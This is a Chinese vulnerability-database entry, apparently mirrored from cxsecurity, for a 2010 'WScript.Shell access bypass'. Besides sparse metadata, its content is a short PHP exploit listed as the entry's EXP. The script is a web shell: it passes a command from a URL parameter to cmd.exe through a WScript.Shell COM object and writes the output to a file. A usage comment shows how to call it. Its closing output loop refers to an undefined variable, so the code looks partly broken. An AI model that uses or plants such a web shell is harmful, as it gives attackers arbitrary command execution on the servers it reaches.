Windows Scripts WScript.Shell - access bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051372 漏洞类型
发布时间 2010-01-09 更新时间 2010-01-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010010025
|漏洞详情
漏洞细节尚未披露
|漏洞EXP



<?php
// Windows Scripts Access Bypass Vulnerability
// by : Hussin X
// WwW.iq-ty.com<http://WwW.iq-ty.com>
// use www.iq-ty.com/bypass.php?iq=dir<http://www.iq-ty.com/bypass.php?iq=dir> << or any commands
// go to the iq-security.txt

$iqsec = new COM("WScript.Shell");
$iqsec->Run('c:\windows\system32\cmd.exe /c '.escapeshellarg($_GET[iq]).' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/iq-security.txt');
for ($i=0; $i<count($iqhost); $i++) {echo nl2br(htmlentities($iqhost[$i]));}


?>